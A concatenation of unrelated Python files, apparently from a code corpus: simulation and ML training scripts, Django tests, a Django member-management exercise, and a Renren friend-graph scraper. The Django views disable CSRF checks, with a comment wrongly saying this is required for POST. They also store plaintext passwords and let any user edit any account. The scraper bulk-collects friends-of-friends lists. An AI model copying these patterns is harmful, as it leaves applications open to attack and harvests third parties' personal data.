        print '{} -> {:5.2f} +/- {:5.2f}'.format(key,data[key][0],data[key][1])
def cleanup(path):
    """
    Sorts OUTCyl_*.m result files found under *path* into per-layout
    folders (Three/Four/FiveCylPosOpt).  The cylinder count is inferred
    from the file name: number of '-' separators + 1.
    """
    folders = {3: 'ThreeCylPosOpt', 4: 'FourCylPosOpt', 5: 'FiveCylPosOpt'}
    for f in glob.glob(path + '/OUTCyl_*.m'):
        tail = os.path.split(f)[1]
        numCylinders = tail.count('-') + 1
        newdir = folders.get(numCylinders)
        # BUG FIX: the original left 'newdir' unbound (NameError) for any
        # other cylinder count; skip such files instead of crashing.
        if newdir is None:
            continue
        os.rename(f, os.path.join(newdir, tail))
###########################################################################
# #
# MAIN #
# #
###########################################################################
import argparse
if __name__ == '__main__':
    # Command-line driver: run simulations, emit plot decks, optimize
    # cylinder positions, summarize results, or tidy output files.
    parser = argparse.ArgumentParser()
    parser.add_argument('-r','--run',action="store_true",
        default=False,help='Runs the cylinders for multiple polymers and precent loadings')
    parser.add_argument('-p','--plot',action="store_true",
        default=False,help='Creates input decks for plotting')
    parser.add_argument('-c','--clean',action="store_true",
        default=False,help='Cleans up the files')
    parser.add_argument('-a','--analysis',action="store_true",default=False,help="Analyze the results")
    parser.add_argument('path', nargs='?', default='CylPosOpt',help='Specifiy the output directory to summerize')
    parser.add_argument('-o','--optimize',action='store',type=int,default=-1,help='Run a number of optimizations on the positions. If 0 is entered a summary is preformed on the directory provided with path')
    parser.add_argument('loading',metavar='loading',type=float,nargs='*',action="store",default=(0.1,0.2,0.3),help='Precent Loading of LiF')
    args = parser.parse_args()
    if args.run:
        run(args.loading,('PS','PEN'))
    if args.plot:
        createInputPlotDecks()
    if args.optimize > 0:
        # Only the last yPos assignment (four cylinders) is active; the
        # earlier/commented lines are alternative layouts.
        yPos = (7.625,0,-7.625)
        yPos = (9.15,3.05,-3.05,-9.15)
        #yPos = (10.16,5.08,0.0,-5.08,-10.16)
        pos = CreatePositions(yPos,args.optimize)
        loading = (0.3,)
        polymers = ('PS',)
        PositionOptimization(loading,polymers,pos)
    if args.optimize == 0:
        OptimizationSummary(args.path)
    if args.analysis:
        summerize()
    if args.clean:
        cleanup(os.getcwd())
|
994,939 | 7c8f3bc23919d7d3a66676130914f0a38feb095f | # -*-coding:utf-8 -*-
# File :kaoyanbang.py
# Author:George
# Date : 2019/10/21
# motto: Someone always give up while someone always try!
from com.android.monkeyrunner import MonkeyRunner as mr
from com.android.monkeyrunner import MonkeyDevice as md
# MonkeyRunner automation: install and launch the app on an attached
# Android device.  Runs under Jython via the SDK's monkeyrunner tool,
# not a regular CPython interpreter.
print("Connect devices...")
# Blocks until a device or emulator is attached.
device = mr.waitForConnection()
print("Install app...")
device.installPackage(r"F:\Appium\App\kaoyan3.1.0.apk")
print("Launch app...")
# startActivity takes a "<package>/<activity>" component string.
package = 'com.tal.kaoyan'
activity = 'com.tal.kaoyan.ui.activity.SplashActivity'
runComponent = package + '/' + activity
device.startActivity(component=runComponent)
994,940 | d58044c24104f49dd084d32e0659c8676c2dfe6c | import Parser
import Processor
import Plot
import numpy as np
# Parse log files
# Raw HTTP access logs (July/August 1995).
julLogFile = "../data/in/access_log_Jul95"
augLogFile = "../data/in/access_log_Aug95"
# One-time preprocessing step; re-enable to regenerate the CSV below.
#Parser.proccessLog(julLogFile, augLogFile)
# Load data
# Aggregation window (minutes) and batch size handed to each predictor.
timeWindow = 60
batchSize = 10
# NOTE(review): 'file' shadows the builtin name; kept as-is here.
file = "../data/out/data_"+str(timeWindow)+"min.csv"
data = np.loadtxt(file, dtype=str, delimiter=",", skiprows=1)
# Run each predictor; the first element of each result is plotted below.
# runKNN takes the CSV path while the others take the loaded array --
# presumably it re-reads the file itself; confirm in Processor.
reWPredicted = Processor.runReW(data, timeWindow, batchSize)
cReWPredicted = Processor.runCReW(data, timeWindow, batchSize)
knnPredicted = Processor.runKNN(file, timeWindow, batchSize)
svmPredicted = Processor.runSVM(data, timeWindow, batchSize)
Plot.zoom(data, reWPredicted[0], cReWPredicted[0],knnPredicted[0], svmPredicted[0], timeWindow)
|
994,941 | 0a4a68e76564c6a694a0a5a3854ffd7558a7a489 | import responses
from django.test import TestCase
from apps.utils.video import VideoHelper
class VideoHelperTestCase(TestCase):
    """Tests for VideoHelper.thumbnail across video providers."""
    def test_youtube_thumbnail(self):
        # YouTube thumbnail URLs are derived from the video id in the
        # watch URL; no HTTP call is needed.
        url = 'https://www.youtube.com/watch?v=Google123'
        thumbnail = VideoHelper(url).thumbnail
        self.assertEqual(thumbnail, 'http://img.youtube.com/vi/Google123/default.jpg')
    @responses.activate
    def test_rutube_thumbnail(self):
        # Rutube resolves thumbnails via its API; the HTTP call is stubbed
        # with a recorded JSON fixture.
        responses.add(responses.GET, 'http://rutube.ru/api/video/6fd81c1c212c002673280850a1c56415/',
                      body=open('fixtures/json/rutube.json').read())
        url = 'http://rutube.ru/video/6fd81c1c212c002673280850a1c56415/'
        thumbnail = VideoHelper(url).thumbnail
        self.assertEqual(thumbnail, 'http://pic.rutube.ru/video/3f/79/3f7991857b0ae5621684681640b0865d.jpg')
    @responses.activate
    def test_vimeo_thumbnail(self):
        # Vimeo also resolves thumbnails through its JSON API (stubbed).
        responses.add(responses.GET, 'http://vimeo.com/api/v2/video/55028438.json',
                      body=open('fixtures/json/vimeo.json').read())
        url = 'http://vimeo.com/55028438'
        thumbnail = VideoHelper(url).thumbnail
        self.assertEqual(thumbnail, 'http://i.vimeocdn.com/video/481108654_200x150.jpg')
|
## How to run the server
# ``` $ python manage.py migrate```
# ``` $ python manage.py runserver```
# To shut it down:
# ``` $ docker stop oracle12c```
# ``` $ docker-machine stop```
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
### Database connection
from django.db import connection
cursor = connection.cursor()
# 'connection' is needed to run raw SQL against the DB, bypassing the model layer;
# a cursor (from it) is what actually executes statements.
from django.contrib.auth.models import User
from django.contrib.auth import authenticate as auth1
from django.contrib.auth import login as login1
from django.contrib.auth import logout as logout1
# Uses the User model that django provides out of the box.
from .models import Table2 # models.py파일의 Table2클래스
from django.db.models import Sum, Max, Min, Count, Avg
import pandas as pd
import matplotlib.pyplot as plt
import io # byte로 변환
import base64 #byte를 base64로 변경
from matplotlib import font_manager, rc # 한글폰트 적용
####실습 시작######################################
def exam_select(request):
    """
    Paginated listing of Table2 rows, 10 per page, optionally filtered by
    a name substring passed as ?txt=.  Context: 'list' (rows for the
    page), 'pages' (page-number range), 'page_html' (current page).
    """
    if request.method == 'GET':
        txt = request.GET.get('txt', '')
        page = int(request.GET.get('page', 1))
        # page 1 -> rows 0..9, page 2 -> rows 10..19, ...
        if txt=='':
            list = Table2.objects.all() [page*10-10:page*10]
            # SELECT*FROM MEMBER_TABLE2
            cnt = Table2.objects.all().count()
            # SELECT COUNT(*) FROM MEMBER_TABLE2
            tot = (cnt-1)//10+1
        else:
            list = Table2.objects.filter(name__contains=txt)[page*10-10:page*10]
            # SELECT*FROM MEMBER_TABLE2 WHERE name LIKE '%가%'
            cnt = Table2.objects.filter(name__contains=txt).count()
            # SELECT COUNT(*)FROM MEMBER_TABLE2 WHERE name LIKE '%가%'
            tot = (cnt-1)//10+1
        return render(request, 'member/exam_select.html', \
            {'list':list, 'pages':range(1,tot+1,1),'page_html':page}) # single context-dict parameter
# 반별 국어, 영어, 수학 합계
# list = Table2.objects.aggregate(Sum('math'))
# # SELECT SUM(math) FROM MEMBER_TABLE2
# # WHERE CLASS_ROOM=101
# list = Table2.objects.all().values(['no', 'name'])
# # SELECT NO, NAME FROM MEMBER_TABLE2
# list = Table2.objects.all().order_by('name')
# # 복잡한 SELECT은 다음과 같이 raw 안에 SQL문을 넣어 구현
# list = Table2.objects.raw("SELECT*FROM MEMBER_TABLE2 ORDER BY name ASC")
# list = Table2.objects.values('classroom').annotate(kor=Sum('kor'), eng=Sum('eng'), math=Sum('math'))
# # SELECT
# # SUM(kor) AS kor,
# # SUM(eng) AS eng,
# # SUM(math) AS math
# # FROM MEMBER_TABLE2
# return render(request, 'member/exam_select.html',{"list":list})
def exam_insert(request):
    """
    Bulk-create Table2 rows.

    GET renders 20 blank input rows; POST reads the parallel name/score
    lists and inserts them with a single bulk_create call, then returns
    to the list view.
    """
    if request.method == 'GET':
        return render(request,'member/exam_insert.html',{'cnt':range(1,21)})
    elif request.method=='POST':
        na = request.POST.getlist('name[]')
        ko = request.POST.getlist('kor[]')
        en = request.POST.getlist('eng[]')
        ma = request.POST.getlist('math[]')
        cl = request.POST.getlist('classroom[]')
        # Build one unsaved object per submitted row.  The posted no[]
        # values are never assigned (the DB allocates the key), so that
        # unused read and the leftover debug prints were removed.
        objs = []
        for i in range(len(na)):
            obj = Table2()
            obj.name = na[i]
            obj.kor = ko[i]
            obj.eng = en[i]
            obj.math = ma[i]
            obj.classroom = cl[i]
            objs.append(obj)
        Table2.objects.bulk_create(objs)
        return redirect('/member/exam_select')
def exam_update(request):
    """
    Two-step bulk edit of Table2 rows.

    POST menu='list' stores the checked row keys in the session and
    redirects back here; GET then shows an edit form for those rows;
    POST menu='update' writes all edited fields with bulk_update.
    """
    if request.method == 'GET':
        n = request.session['no']
        #n = request.POST.get('no') # single-value variant
        rows = Table2.objects.filter(no__in=n)
        return render(request, 'member/exam_update.html', {'list':rows})
    elif request.method == 'POST':
        menu = request.POST['menu']
        if menu == "list":
            # Remember which rows were checked, then fall back to GET.
            no = request.POST.getlist('chk[]')
            request.session['no'] = no
            return redirect('/member/exam_update')
        elif menu == "update":
            print("=================================================")
            no = request.POST.getlist('no[]')
            name = request.POST.getlist('name[]')
            kor = request.POST.getlist('kor[]')
            eng = request.POST.getlist('eng[]')
            math = request.POST.getlist('math[]')
            classroom = request.POST.getlist('classroom[]')
            objs=[]
            for i in range(0, len(no), 1):
                # Load each row by key and overwrite the editable fields.
                obj = Table2.objects.get(no=no[i])
                obj.name = name[i]
                obj.kor = kor[i]
                obj.eng = eng[i]
                obj.math = math[i]
                obj.classroom = classroom[i]
                objs.append(obj)
            Table2.objects.bulk_update(objs, ['name', 'kor', 'eng', 'math', 'classroom'])
            return redirect('/member/exam_select')
        else:
            # Deliberately wrong target so an unexpected menu value is
            # easy to notice during debugging.
            return redirect('/board/list')
def exam_delete(request):
    """Delete the Table2 row given by ?no= and return to the list page."""
    if request.method == 'GET':
        n = request.GET.get('no', 0)
        # BUG FIX: the default must be a string -- it is concatenated into
        # the redirect URL below (the old default of int 1 raised
        # TypeError whenever ?page= was omitted).
        p = request.GET.get('page', '1')
        row = Table2.objects.get(no=n)
        row.delete()
        return redirect('/member/exam_select?page='+p)
####실습 끝####################################
def auth_pw(request):
    """
    Password-change view: re-authenticate with the current password,
    then persist the new one.
    """
    if request.method == 'GET':
        # Anonymous users go to the login page first.
        if not request.user.is_authenticated:
            return redirect('/member/auth_login')
        return render(request, 'member/auth_pw.html')
    elif request.method == "POST":
        current_pw = request.POST['pw']
        new_pw = request.POST['pw1']
        user = auth1(request, username=request.user, password=current_pw)
        if user:
            user.set_password(new_pw)
            user.save()
            return redirect('/member/auth_index')
        # Wrong current password: show the form again.
        return redirect('/member/auth_pw')
def auth_edit(request):
    """
    Profile edit view for django.contrib.auth users.

    GET shows the current name/email; POST saves the submitted values.
    """
    if request.method == 'GET':
        if not request.user.is_authenticated:
            return redirect('/member/auth_login')
        user = User.objects.get(username=request.user)
        return render(request, 'member/auth_edit.html', {'obj':user})
    if request.method == "POST":
        user = User.objects.get(username=request.POST['username'])
        user.first_name = request.POST['first_name']
        user.email = request.POST['email']
        user.save()
        return redirect('/member/auth_index')
def auth_login(request):
    """Login view backed by django.contrib.auth (session-based)."""
    if request.method == "GET":
        return render(request, 'member/auth_login.html')
    elif request.method == 'POST':
        # Verify the credentials against the auth backend.
        user = auth1(request,
                     username=request.POST['username'],
                     password=request.POST['password'])
        if user is not None:
            login1(request, user)  # records the user in the session
            return redirect('/member/auth_index')
        return redirect('/member/auth_login')
def auth_logout(request):
    """
    Log out via GET or POST -- GET is accepted so a plain link (or a
    typed URL) logs the user out as well.
    """
    if request.method in ('GET', 'POST'):
        logout1(request)  # resets the session
        return redirect('/member/auth_index')
@csrf_exempt
def auth_index(request):
    """Landing page for the auth demo (GET only)."""
    if request.method == "GET":
        return render(request, 'member/auth_index.html')
@csrf_exempt
def auth_join(request):
    """
    Sign-up view backed by django.contrib.auth's User model.

    GET renders the form; POST creates the account and returns to the
    auth landing page.
    """
    if request.method == 'GET':
        return render(request, 'member/auth_join.html')
    elif request.method == 'POST':
        # create_user hashes the password and builds the row.
        new_user = User.objects.create_user(
            username=request.POST['username'],
            password=request.POST['password'],
            first_name=request.POST['first_name'],
            email=request.POST['email'])
        new_user.save()
        return redirect('/member/auth_index')
def list(request):
    """
    Member list page: shows every row of MEMBER and MEMBER1 (VIP),
    fetched with raw SQL ordered by ID.

    NOTE(review): the name 'list' shadows the builtin; kept because the
    URLconf refers to it.
    """
    # Raw SQL is used here on purpose (data predates the model layer);
    # rows come back ordered by ID ascending.
    sql = 'SELECT*FROM MEMBER ORDER BY ID ASC'
    cursor.execute(sql) #
    # cursor is the unit for executing a single SQL statement; the raw
    # connection object is not used directly.
    data = cursor.fetchall() # fetch every row of the result set
    print(type(data)) # list
    print(data)
    # [(one tuple per row, one element per column), ...]
    # The template receives 'list'/'list2' (row tuples) plus a 'title'
    # string; 'title' is a single value while 'list' is iterated.
    sql = 'SELECT*FROM MEMBER1 ORDER BY ID ASC' # VIP member list
    cursor.execute(sql)
    data2 = cursor.fetchall()
    print(type(data)) # list
    print(data)
    return render(request, 'member/list.html', {'list':data, 'list2':data2, 'title':'회원목록'})
def member(request):
    """Redirect /member/member to the member list (any HTTP method)."""
    # The original evaluated `request.method == 'GET'` without using the
    # result -- a no-op expression; the redirect was unconditional either
    # way, so the dead comparison is removed.
    return redirect('/member/list')
def index(request):
    """Render the member app landing page (any HTTP method)."""
    # The original evaluated `request.method == 'GET'` without using the
    # result -- a no-op; rendering was unconditional, so it is removed.
    # (render replaces the older HttpResponse('index page <hr />') style.)
    return render(request, 'member/index.html')
# For security, django requires CSRF handling on every POST.
@csrf_exempt # required wherever values arrive via POST
def join(request):
    """
    Member sign-up against the raw MEMBER table.

    GET renders the form; POST inserts the row with parameterized SQL
    and redirects to the member list.
    """
    if request.method == 'GET':
        return render(request, 'member/join.html')
    elif request.method == 'POST':
        id = request.POST['id']
        na = request.POST['name']
        pw = request.POST['pw']
        ag = request.POST['age']
        ar = [id, na, ag, pw] # bind parameters, in the column order below
        # sqlite variant (kept for reference):
        # sql ='''
        # INSERT INTO MEMBER(ID,NAME,AGE,PW,JOINDATE)
        # VALUES (%s, %s, %s, %s, date('now'))
        # '''
        # oracle variant
        sql ='''
        INSERT INTO MEMBER(ID,NAME,AGE,PW,JOINDATE)
        VALUES (%s, %s, %s, %s, SYSDATE)
        '''
        cursor.execute(sql, ar) # binds ar into the placeholders in order
        # Binding is positional and independent of the form's field order:
        # each value is routed to its named column, not a cell position.
        return redirect('/member/member')
        # same as typing 127.0.0.1:8000/member/member in the browser
@csrf_exempt
def join1(request):
    """
    Extended sign-up against the raw MEMBER1 (VIP) table, which also
    stores email, phone, and an image reference.
    """
    if request.method == "GET":
        return render(request, 'member/join1.html')
    elif request.method == "POST":
        id = request.POST['id']
        na = request.POST['name']
        pw = request.POST['pw']
        im = request.POST['img']
        te = request.POST['tel']
        em = request.POST['email']
        ar = [id, pw, na, em, te, im]
        sql = '''
        INSERT INTO MEMBER1(ID, PW, NAME, EMAIL, TEL, IMG, JOINDATE)
        VALUES (%s, %s, %s, %s, %s, %s, SYSDATE)
        '''
        cursor.execute(sql, ar)
        return redirect('/member/member')
@csrf_exempt
def edit(request):
    """
    Edit the logged-in member's row in MEMBER.

    GET loads the current row (keyed by the session's 'userid') into the
    form; POST writes NAME/AGE back and returns to the index.
    """
    if request.method == "GET":
        ar = [request.session['userid']]
        sql = '''
        SELECT *
        FROM MEMBER
        WHERE ID=%s
        '''
        # WHERE acts like an if: keep rows whose ID equals the bound value.
        cursor.execute(sql, ar)
        data=cursor.fetchone()
        print(data)
        return render(request, 'member/edit.html', {'one':data})
    elif request.method == 'POST':
        ar = [
            request.POST['name'],
            request.POST['age'],
            request.POST['id']
        ]
        sql = '''
        UPDATE MEMBER SET NAME=%s, AGE=%s
        WHERE ID = %s
        '''
        cursor.execute(sql, ar)
        return redirect('/member/index')
@csrf_exempt
def login(request):
    """
    Raw-SQL login: check ID/PW against MEMBER and, on success, stash the
    user's id and name in the session.
    """
    if request.method == 'GET':
        print('loginGET')
        return render(request, 'member/login.html')
    elif request.method == 'POST':
        print('loginPOST')
        ar = [request.POST['id'], request.POST['pw']]
        sql = '''
        SELECT ID, NAME
        FROM MEMBER
        WHERE ID=%s AND PW=%s
        '''
        # Only ID and NAME are selected; * would fetch every column in
        # table order, and the password must never reach the session.
        cursor.execute(sql, ar)
        data = cursor.fetchone()
        print(type(data))
        print(data)
        if data:
            request.session['userid'] =data[0]
            request.session['username'] =data[1]
            for key, value in request.session.items():
                print('키값은{} 이고 밸류는{}이다'.format(key, value))
            return redirect('/member/index')
        # Falls through here on bad credentials.
        print('로그인실패')
        return redirect('/member/index')
@csrf_exempt
def logout(request):
    """Drop the raw-SQL login's session keys and return to the index."""
    if request.method in ('GET', 'POST'):
        del request.session['userid']
        del request.session['username']
        return redirect('/member/index')
@csrf_exempt
def delete(request):
    """Delete the logged-in member's MEMBER row, then log out."""
    if request.method in ('GET', 'POST'):
        params = [request.session['userid']]
        sql = 'DELETE FROM MEMBER WHERE ID=%s'
        cursor.execute(sql, params)
        return redirect('/member/logout')
###################
def js_index(request):
    """Render the JavaScript demo index page (GET only)."""
    if request.method == "GET":
        return render(request, 'member/js_index.html')
def js_chart(request):
    """Render the JavaScript chart demo page (GET only)."""
    if request.method == "GET":
        return render(request, 'member/js_chart.html')
# def dataframe(request):
# #1. QuerySet -> list로 변경
# rows = list(Table2.objects.all().values("no", 'name', 'kor'))[0:10]
# # rows = Table2.objects.all() # = SELECT * FROM MEMBER_TABLE2
# # SELECT NO,NAME,KOR FROM MEMBER_TABLE2
# # [{'no': 260, 'name': '멍뭉이0', 'kor': 0}, ...]
# # 2. list->dataframe으로 변경 ***전처리***
# df = pd.DataFrame(rows)
# # 표로 바뀜
# # 3. dataframe -> list
# rows1 = df.values.tolist()
# # [['no': 260, 'name': '멍뭉이0', 'kor': 0], ...]
# return render(request, 'member/dataframe.html',\
# {"df_table":df.to_html(), "list":rows})
def graph(request):
    """Render per-classroom score sums as a bar chart, inlined as a base64 PNG.

    Queries MEMBER_TABLE2 grouped by classroom with raw SQL, draws the bars
    with matplotlib off-screen, captures the figure into an in-memory PNG and
    passes a data URI to the template (graph.html uses <img src='{{graph}}' />).
    """
    # NOTE(review): a long block of commented-out Django-ORM experiments
    # (aggregate/annotate with Sum, filter variants such as kor__gt=80, and
    # pandas DataFrame conversions) previously lived here; the raw-SQL
    # GROUP BY below is what is actually used. Per a note in those comments,
    # std (standard deviation) reportedly could not be used with aggregate.
    # Load a Korean-capable font and apply it globally so axis labels render.
    font_name = font_manager.FontProperties\
        (fname='C:/Windows/Fonts/gulim.ttc').get_name()
    rc('font', family=font_name)
    plt.rcParams['figure.figsize'] = (12, 4)
    sql = '''
    SELECT
    CLASSROOM, SUM(kor) , SUM(eng), SUM(math)
    FROM MEMBER_TABLE2
    GROUP BY CLASSROOM
    '''
    print(sql)
    cursor.execute(sql)
    score = cursor.fetchall()
    print(score)
    print(score[0][0])
    # Split the (classroom, kor_sum, eng_sum, math_sum) rows into columns.
    group = []
    ksum = []
    esum = []
    msum = []
    for i in score:
        group.append(i[0])
        ksum.append(i[1])
        esum.append(i[2])
        msum.append(i[3])
    plt.title("과목 평균")
    plt.xlabel("과목")
    plt.ylabel("점수")
    # Three overlaid bar series, one per subject.
    plt.bar(group, ksum)
    plt.bar(group, esum)
    plt.bar(group, msum)
    # plt.show() cannot be used from a web request.
    plt.draw()  # render the figure off-screen
    img = io.BytesIO()  # hold the PNG bytes in memory
    plt.savefig(img, format='png')
    img_url = base64.b64encode(img.getvalue()).decode()
    plt.close()  # release the figure to avoid leaking matplotlib state
    return render(request, 'member/graph.html',
                  {"graph": 'data:;base64,{}'.format(img_url)})
    # graph.html consumes this as: <img src='{{graph}}' />
994,943 | 6bb27baeea58f8c456c79b8cd3801ae773aac497 | import pickle as pickle
import os
import pandas as pd
import torch
import argparse
import glob
import json
import time
import numpy as np
import random
from attrdict import AttrDict
from sklearn.metrics import accuracy_score
from transformers import AutoTokenizer, BertForSequenceClassification, Trainer, TrainingArguments, BertConfig
from transformers import AutoModelForSequenceClassification, AutoConfig
from transformers import ElectraTokenizer, ElectraForSequenceClassification, ElectraConfig
from transformers import XLMRobertaConfig, XLMRobertaTokenizer, XLMRobertaForSequenceClassification
from torch.utils.tensorboard import SummaryWriter
from transformers.integrations import TensorBoardCallback
from load_data import *
def seed_everything(seed):
    """Seed every RNG in play (stdlib, numpy, torch CPU/GPU) and force
    deterministic cuDNN behaviour so training runs are reproducible."""
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)  # covers multi-GPU setups
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
# Metrics function used for evaluation.
def compute_metrics(pred):
    """Compute evaluation metrics for a HuggingFace Trainer prediction.

    Args:
        pred: EvalPrediction-like object with ``label_ids`` (gold labels) and
            ``predictions`` (per-class logits, shape [n_samples, n_classes]).

    Returns:
        dict with a single 'accuracy' entry in [0.0, 1.0].
    """
    label = pred.label_ids
    preds = pred.predictions.argmax(-1)
    # Plain numpy accuracy; equivalent to sklearn.metrics.accuracy_score for
    # 1-D label arrays, without the heavyweight dependency for a one-liner.
    acc = float(np.mean(np.asarray(label) == np.asarray(preds)))
    return {
        'accuracy': acc,
    }
"""
class testTrainer(Trainer):
def __init__(self):
self.criterion = torch.nn.BCEWithLogitsLoss()
def compute_loss(self, model, inputs, return_outputs=False):
label = inputs.pop('label')
test_targets = torch.zeros((len(label), 41))
for l in range(len(label)):
if label[l] == 0:
test_targets[l, :] = 1/41
else:
idx = label[l]-1
test_targets[l, idx] = 1
test_outputs = model(**inputs)
print(test_outputs)
loss = self.criterion(test_outputs, test_targets)
print(test_targets)
exit(0)
return (loss, test_outputs) if return_outputs else loss
"""
class testTrainer(Trainer):
    """Trainer variant for the 41-way "real relation" setup.

    Trains with BCEWithLogitsLoss over 41 outputs; label 0 (no-relation)
    has no output column and is instead spread uniformly over all classes.
    """

    def compute_loss(self, model, inputs, return_outputs=False):
        label = inputs.pop("label")
        outputs = model(**inputs)
        logits = outputs.logits
        loss_fct = torch.nn.BCEWithLogitsLoss()
        # BUGFIX: build the soft targets on the same device as the model's
        # output instead of a hard-coded 'cuda:0', so CPU runs and
        # non-default-GPU runs work too.
        test_targets = torch.zeros((len(label), 41), device=logits.device)
        for l in range(len(label)):
            if label[l] == 0:
                # "no relation": uniform mass over every real class.
                test_targets[l, :] = 1 / 41
            else:
                # Shift by one because class 0 has no output column.
                idx = label[l] - 1
                test_targets[l, idx] = 1
        loss = loss_fct(logits, test_targets)
        return (loss, outputs) if return_outputs else loss
def train(args):
    """Train a relation-extraction sequence classifier from a config dict.

    Expected keys: seed, output_dir, logging_dir, MODEL_NAME, EPOCH,
    optimizer, learning_rate, batch_size, and the 'on'/'off' switches
    rtq, two_sentence, except_0, entity_token.
    """
    seed = args['seed']
    save_dir = args['output_dir']
    logging_dir = args['logging_dir']
    MODEL_NAME = args['MODEL_NAME']
    epochs = args['EPOCH']
    optimizer_name = args['optimizer']  # NOTE(review): read but currently unused
    learning_rate = args['learning_rate']
    batch_size = args['batch_size']
    rtq = args['rtq']
    two_sentence = args['two_sentence']
    except_0 = args['except_0']
    entity_token = args['entity_token']
    seed_everything(seed)

    # Load tokenizer.
    # BUGFIX: the XLM-R tokenizer used to be assigned and then immediately
    # overwritten by the unconditional AutoTokenizer line; keep it via else.
    if 'xlm' in MODEL_NAME:
        tokenizer = XLMRobertaTokenizer.from_pretrained(
            MODEL_NAME,
            additional_special_tokens=['[E1]', '[E2]', '[E1-NER]', '[E2-NER]'])
    else:
        tokenizer = AutoTokenizer.from_pretrained(
            MODEL_NAME,
            additional_special_tokens=['[E1]', '[E2]', '[E1-NER]', '[E2-NER]'])

    # Load dataset (NER-annotated variant when entity tokens are enabled).
    if entity_token == 'on':
        train_dataset = ner_load_data("/opt/ml/input/data/train/ner_train_normalize.csv")
    else:
        train_dataset = load_data("/opt/ml/input/data/train/train.tsv")
    train_label = train_dataset['label'].values

    # Tokenize and wrap in the torch Dataset matching the chosen input format.
    if rtq == 'on':
        tokenized_train = rtq_tokenized_dataset(train_dataset, tokenizer)
        processed_dataset = RtQDataset(tokenized_train, train_label)
    elif two_sentence == 'on':
        tokenized_train = two_sentence_tokenized_dataset(train_dataset, tokenizer)
        processed_dataset = TwoSentenceDataset(tokenized_train, train_label)
    elif entity_token == 'on':
        tokenized_train = ner_tokenized_dataset(train_dataset, tokenizer)
        processed_dataset = RE_Dataset(tokenized_train, train_label)
    else:
        tokenized_train = tokenized_dataset(train_dataset, tokenizer)
        processed_dataset = RE_Dataset(tokenized_train, train_label)

    device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')

    # Model config: 2 labels for the relation/no-relation task, 41 when
    # class 0 is handled by testTrainer's custom loss, 42 otherwise.
    config = AutoConfig.from_pretrained(MODEL_NAME)
    if 'xlm' in MODEL_NAME:
        config = XLMRobertaConfig.from_pretrained(MODEL_NAME)
    if rtq == 'on':
        config.num_labels = 2
    elif except_0 == 'on':
        config.num_labels = 41
    else:
        config.num_labels = 42

    if 'xlm' in MODEL_NAME:
        model = XLMRobertaForSequenceClassification.from_pretrained(MODEL_NAME, config=config)
    else:
        model = AutoModelForSequenceClassification.from_pretrained(MODEL_NAME, config=config)
    # Account for the added entity special tokens.
    model.resize_token_embeddings(len(tokenizer))
    model.to(device)

    # See https://huggingface.co/transformers/main_classes/trainer.html#trainingarguments
    training_args = TrainingArguments(
        output_dir=save_dir,                      # output directory
        save_total_limit=3,                       # number of checkpoints kept
        save_strategy='epoch',
        num_train_epochs=epochs,                  # total training epochs
        learning_rate=learning_rate,
        per_device_train_batch_size=batch_size,
        warmup_steps=500,                         # lr-scheduler warmup steps
        weight_decay=0.01,
        logging_dir=logging_dir,                  # directory for storing logs
        logging_steps=100,                        # log saving step
        label_smoothing_factor=0.5
    )

    # The custom trainer applies the 41-way BCE loss when class 0 is excluded.
    if except_0 == 'on':
        trainer = testTrainer(
            model=model,
            args=training_args,
            train_dataset=processed_dataset,
        )
    else:
        trainer = Trainer(
            model=model,
            args=training_args,
            train_dataset=processed_dataset,
        )

    trainer.train()
if __name__ == '__main__':
    # CLI entry point: the only argument is a JSON config file whose keys
    # are made attribute-accessible via AttrDict and handed to train().
    parser = argparse.ArgumentParser()
    parser.add_argument('--config_file', type=str, required=True)
    args = parser.parse_args()
    with open(args.config_file) as f:
        args = AttrDict(json.load(f))  # NOTE: rebinds `args` from Namespace to AttrDict
    print(args)
    train(args)
|
994,944 | 2f000b46fdf55d9ed9e3c06e8021facfd92fce00 | #import time
from rrBrowser import RenrenBrowser
from rrParser import RenrenParser
#from rrDB import RenrenDb
from rrRecorder import RenrenRecorder
# Where scraped Renren data is stored on disk.
storePath = 'D:/Projects/NetSci/U&I/data'
# Credentials are read interactively so they never live in the source file.
rrID = input("Your Renren ID (e.g.239486743): ")
rrUser = input("Your Renren Login Email: ")
rrPassword = input("Your Renren Password: ")
browser = RenrenBrowser(user=rrUser, passwd=rrPassword, path=storePath)
browser.setLogLevel(40)  # 40 == logging.ERROR: keep the crawl output quiet
browser.login()
recorder = RenrenRecorder(path=browser.getPwdRoot(), writeBack=True)
parser = RenrenParser(browser, recorder)
# Pass 1: fetch and record the logged-in user's own friend list.
browser.friendListPage(rrID)
parser.friends()
recorder.save()
# Pass 2: fetch the friend list of every friend (the 2-hop network).
# NOTE(review): an earlier version throttled this loop (commented-out timing
# code removed); pages are now fetched back to back and parsed at the end.
myFriends = recorder.getFriends(rrID)
cnt = 0
for myFriend in myFriends:
    browser.friendListPage(myFriend)
    print("{}: {}'s friendship grabbed".format(cnt, myFriend))
    cnt = cnt + 1
parser.friends()
|
994,945 | 7cae3d4f42e3c2cc6406b31076691dafb2740c26 | from os.path import expanduser
import numpy as np
import pandas as pd
import re
import collections
import time
class ElapsedTimer(object):
    """Wall-clock stopwatch started at construction time."""

    def __init__(self):
        # Remember when the timer was created.
        self.start_time = time.time()

    def elapsed(self, sec):
        """Format a duration in seconds as 'N sec', 'N min' or 'N hr'."""
        minute = 60
        hour = 60 * 60
        if sec < minute:
            return str(sec) + " sec"
        if sec < hour:
            return str(sec / minute) + " min"
        return str(sec / hour) + " hr"

    def elapsed_time(self):
        """Print how long it has been since this timer was created."""
        print("The running time of this code: %s " % self.elapsed(time.time() - self.start_time))
def csv2ndarray(feature_path, feature_files):
    """Load comma-separated feature matrices and stack them into a 3-D float array.

    Args:
        feature_path: directory prefix, including the trailing separator.
        feature_files: file names to read; each file holds one 2-D matrix.

    Returns:
        np.ndarray of shape (n_files, n_rows, n_cols), dtype float.
    """
    feature_input = []
    for name in feature_files:
        frame = pd.read_csv(feature_path + name, sep=',', index_col=False, header=None)
        # BUGFIX: DataFrame.as_matrix() was removed in pandas 0.25 -- use
        # to_numpy(). The original same-shape reshape was a no-op and is gone.
        feature_input.append(frame.to_numpy())
    # BUGFIX: np.float was removed in numpy 1.24; plain float is equivalent.
    return np.array(feature_input, float)
